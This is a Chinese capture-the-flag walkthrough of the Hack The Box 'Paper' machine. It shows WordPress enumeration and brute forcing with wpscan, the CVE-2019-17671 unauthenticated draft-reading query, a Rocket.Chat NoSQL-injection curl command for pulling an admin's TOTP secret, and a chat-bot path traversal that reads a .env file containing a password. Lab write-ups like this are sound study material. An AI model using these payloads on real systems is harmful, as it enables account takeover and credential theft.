当前位置: 首页 > news >正文

HTB paper

news 2025/9/16 10:50:05

进来一个ubuntu自带的欢迎页面,dirsearch扫一下拿拿信息

{"metricId":"6793b6fd-c521-4385-9ea0-b743487d53c1","metrics":{"from":"2021-07-01T07:01:26.689Z","to":"2021-07-01T07:29:18.286Z","successfulInstalls":6,"failedInstalls":0}}

学一点msf的使用

image-20250907110715167

可惜到这里就卡住了,回HTB引导一下

提示What is the domain for the Wordpress blog? 但跟这个有什么关系

好吧,这里有一个htb独特的点,就是默认域名为paper.htb,根据这点再去做子域名扫描,其实在网络里也能看到

image-20250907113901500

注意要用http进office.paper

/wp-admin尝试一下弱密码,进不去

发现官方的一个检测wordpress漏洞的工具wpscan

https://github.com/wpscanteam/wpscan

kali真好用啊,自带最新版本

wpscan --url http://office.paper

image-20250907160219522

wpscan --url http://office.paper -e p
扫描插件,vp扫描插件漏洞,但需要官网申请token

有个主题,msf搜一下

image-20250907160553563

先尝试登录吧,枚举用户名

wpscan --url http://derpnstink.local/weblog -e u

发现三个用户

prisonmike
nick
creedthoughts

wpscan --url http://office.paper -U prisonmike -P /home/gw/桌面/test/fuzzDicts-master/passwordDict/top500.txt

爆破密码

同时进来搜一下这几个用户名,发现一点提示

image-20250907162525781

应该是要想办法看草稿

image-20250907172347385

发现CVE-2019-17671正好对应版本5.2.3未授权访问

estMicheal please remove the secret from drafts for gods sake!Hello employees of Blunder Tiffin,Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.So, I kindly request you all to take your discussions from the public blog to a more private chat system.-Nick# Warning for MichaelMichael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -NickThreat Level MidnightA MOTION PICTURE SCREENPLAY,
WRITTEN AND DIRECTED BY
MICHAEL SCOTT[INT:DAY]Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….# Secret Registration URL of new Employee chat systemhttp://chat.office.paper/register/8qozr226AhkCHZdyY# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.# Also, stop looking at my drafts. Jeez!

这里有一个比较坑爹的点,网上的payload都是asc,无法利用,换成dsc即可查看/?static=1&order=dsc

拿到新的网址

http://chat.office.paper/register/8qozr226AhkCHZdyY

这网页卡的批爆,看的我直发愣。靠刷新大法总算进来了

突然发现这玩意也能打CVE

image-20250907174715537

把账号的双因子认证关闭,然后再找到管理员的邮箱即可

https://cloud.tencent.com/developer/article/1859035

丢给ai构造命令

curl -G 'http://chat.office.paper/api/v1/users.list' \--data-urlencode 'query={"$where":"this.username==='\''admin'\'' && (()=>{ throw this.services.totp.secret })()"}' \-H 'X-Auth-Token: iUj1AzQIi8o8xPsKp21Ck_A6XypHBkYzYLYlq8zxzj5' \-H 'X-Requested-With: XMLHttpRequest' \-H 'Accept-Language: zh-CN' \-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36' \-H 'X-User-Id: ueBvmYywX7advzTJx' \-H 'Content-Type: application/x-www-form-urlencoded' \-H 'Referer: http://chat.office.paper/app/api/server/v1/users.js' \-H 'Cookie: rc_uid=ueBvmYywX7advzTJx; rc_token=iUj1AzQIi8o8xPsKp21Ck_A6XypHBkYzYLYlq8zxzj5'
{"users":[{"_id":"cehLnbjB9xv88JFD4","status":"offline","active":true,"name":"aaa","nameInsensitive":"aaa"},{"_id":"5iP6aLxNrs8E5S47Q","username":"DunMiffsys","status":"offline","active":true,"name":"DunMiff/sys","nameInsensitive":"dunmiff/sys"},{"_id":"SrtTqJwvCRmCNErxD","username":"DwightKSchrute","status":"offline","active":true,"name":"Dwight","avatarETag":"zBgJbDdyr4jyRMpTs","nameInsensitive":"dwight"},{"_id":"W2dajtnh4g9Eakc4d","username":"JIM9334","status":"offline","active":true,"name":"Jim","avatarETag":"DdBhzWmNF84rDipeX","nameInsensitive":"jim"},{"_id":"umhc2LunPqcMxpuhB","username":"Receptionitis15","status":"offline","active":true,"name":"Pam","avatarETag":"8PtGntTXt6HyFMwB3","nameInsensitive":"pam"},{"_id":"ueBvmYywX7advzTJx","status":"online","active":true,"name":"aaa","username":"aaa","nameInsensitive":"aaa"},{"_id":"vzADtHxN58iiaNY95","username":"actuallyoscar","status":"offline","active":true,"name":"Oscar","avatarETag":"eNbvD2htfoiRER4Xc","nameInsensitive":"oscar"},{"_id":"3pACoij7SH35924pr","username":"catlover","status":"offline","active":true,"name":"Angela","avatarETag":"4hEQXscy32FsLJSR7","nameInsensitive":"angela"},{"_id":"w4LmaNZWjyBtDgjpp","username":"creedthoughts","status":"offline","active":true,"name":"Creed","avatarETag":"DduKqSqtQW8eq8fdN","nameInsensitive":"creed"},{"_id":"d22WtYvu9SDvMcTLC","username":"dwightschrute","status":"offline","active":true,"name":"Dwight Schrute","avatarETag":"rAMJJeSFDGziAatoo","nameInsensitive":"dwight schrute"},{"_id":"Q74BkesCHPaRKYjak","username":"hrtoby","status":"offline","active":true,"name":"Toby","avatarETag":"CqFFEbHsDwMQnh4Xz","nameInsensitive":"toby"},{"_id":"MdJX6Kdc3STveZu4Y","username":"kellylikescupcakes","status":"offline","active":true,"name":"Kelly","avatarETag":"nyPiX8DDFzg6ZtgjR","nameInsensitive":"kelly"},{"_id":"DPq2mKNh9m5wENM2p","username":"meredithpalmer","status":"offline","active":true,"name":"Meredith","avatarETag":"49pxS3jA7S24KfsG3","nameInsensitive":"meredith"},{"_id":"NQ2JvGXL8gr7msi7o","username":"nick","status":"offline","active":true,"name":"nick","avatarETag":"cNdxrAfP7Pr5WCirT","nameInsensitive":"nick"},{"_id":"PvSX4dgWzQhnmNujT","status":"offline","active":true,"name":"pb","username":"pb","nameInsensitive":"pb"},{"_id":"aLFDk9yzAhxp6JzrJ","username":"phyllisbobvancefromvancerefigeration","status":"offline","active":true,"name":"Phyllis Vance","avatarETag":"XKtDM4fSXZ3Xf2Ncg","nameInsensitive":"phyllis vance"},{"_id":"ps6gjvimJ3DxeZA86","status":"offline","active":true,"name":"Michael Scott","username":"prisonmike","avatarETag":"Lt5nBQ6hccJnrmjqg","nameInsensitive":"michael scott"},{"_id":"siKFfAEiy9JnJwfCk","username":"realastonkutcher","status":"offline","active":true,"name":"Kevin","avatarETag":"WiGi6HYTadKj5Zf9q","nameInsensitive":"kevin"},{"_id":"qzPLDHsqfYEcJTMJu","username":"realmeredithpalmer","status":"offline","active":true,"name":"Meredith Palmer","avatarETag":"tKenMzo44RFRdEPeM","nameInsensitive":"meredith palmer"},{"_id":"WoxmTzWbvoijWkN5X","username":"recyclops","status":"online","active":true,"name":"RecyclopsBot","avatarETag":"L9pEEpwebBTXPKgqJ","nameInsensitive":"recyclopsbot"},{"_id":"rocket.cat","name":"Rocket.Cat","username":"rocket.cat","status":"online","active":true,"avatarETag":null,"nameInsensitive":"rocket.cat"},{"_id":"BcPDYqH4boQNR3nbE","username":"stanhudson","status":"offline","active":true,"name":"Stanley Hudson","avatarETag":"8FkwWpY62pnZ2dQnm","nameInsensitive":"stanley hudson"},{"_id":"gtNuENR8pianEYMHt","username":"wuphfryan","status":"offline","active":true,"name":"Ryan","avatarETag":"R4XbB4zfGpJbppFC8","nameInsensitive":"ryan"}],"count":23,"offset":0,"total":23,"success":true}

试了一下打不通,回来确认了一下,当前rocket的版本是3.16.3,没有什么好的cve能利用,这里回到聊天室,发现一个有特殊功能的bot

image-20250907183202810

image-20250907183401895

发现可以用…/绕过导致list任意读文件

image-20250907185300097

读取.env文件

<!=====Contents of file ../hubot/.env=====>
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
<!=====End of file ../hubot/.env=====>

这个密码有什么用呢,它的创建者是dwight,当前也在这个目录下,能否用这个ssh登录

image-20250907190331467

image-20250907194347503

image-20250907194245509


文章转载自:

http://QVUEAisx.ttkns.cn
http://KJIUkLor.ttkns.cn
http://eYHbHWw9.ttkns.cn
http://dz2WZJaE.ttkns.cn
http://fUERM2ly.ttkns.cn
http://JTzksLEV.ttkns.cn
http://OjbVt1Tk.ttkns.cn
http://mwiZkw3T.ttkns.cn
http://3KuZQpfS.ttkns.cn
http://6v1if0Rb.ttkns.cn
http://kqV5rps7.ttkns.cn
http://ewNWP5xD.ttkns.cn
http://vPDgcSzQ.ttkns.cn
http://Bogv5F0p.ttkns.cn
http://gjkLLk8L.ttkns.cn
http://RRH4884p.ttkns.cn
http://ffr1T0Qa.ttkns.cn
http://pDHodewi.ttkns.cn
http://n30I0vpb.ttkns.cn
http://XSfNSo8B.ttkns.cn
http://aSV1o2d3.ttkns.cn
http://A2ZoSqN8.ttkns.cn
http://MUN1lDPe.ttkns.cn
http://vfYKEzjt.ttkns.cn
http://TEk65hG6.ttkns.cn
http://Fy5D1MdW.ttkns.cn
http://PrS6kxoN.ttkns.cn
http://ZLtp0SQG.ttkns.cn
http://3wbJTAKR.ttkns.cn
http://lUz6qUL7.ttkns.cn
http://www.dtcms.com/a/385308.html

相关文章:

  • oracle认证有哪几种?如何选择
  • YoloV8改进策略:上采样改进|反卷积|数学上可逆的反卷积」塞进 YOLOv8,涨点不涨参!图像恢复黑科技 Converse2D 的跨界奇袭!
  • springboot netty 服务端网络编程入门与实战
  • 从零开始学AI——15
  • Linux C库函数的可重入与不可重入版本说明
  • ZooKeeper核心知识点总结:分布式系统的“协调者”
  • Unreal故障艺术之RGB颜色分离故障
  • 金融数据---东方财富人气榜-A股
  • 设计模式详解——创建型
  • Java 泛型与通配符全解析
  • Python变量与数据类型全解析:从命名规则到类型转换
  • 了解篇 | StarRocks 是个什么数据库?
  • 风险控制规则引擎:从敏捷开发工具到管理逻辑的承载者
  • 基于Matlab深度学习的植物叶片智能识别系统及其应用
  • AI编程从0-1开发一个小程序
  • Android原生的TextToSpeech,文字合成语音并播放
  • 【03】AI辅助编程完整的安卓二次商业实战-本地构建运行并且调试-二次开发改注册登陆按钮颜色以及整体资源结构熟悉-优雅草伊凡
  • 高德api使用
  • 工程造价指数指标分析:从数据采集到决策支撑的工程经济实践
  • 中控平台数据监控大屏
  • Vue 与 React 的区别?
  • 元图CAD:智能工程图纸解决方案的商业模型创新
  • MySQL 全量备份迁移步骤指南
  • 有关gitlab14.x版本在内网环境下无法添加webhooks的解决方法
  • O3.4 opencv摄像头跟踪
  • 数智管理学(五十二)
  • 121、【OS】【Nuttx】【周边】效果呈现方案解析:find 命令格式(上)
  • Python 3入门指南
  • I.MX6UL:EPIT
  • 企业数字化转型的 4A 架构指南:从概念解读到 TOGAF 阶段对应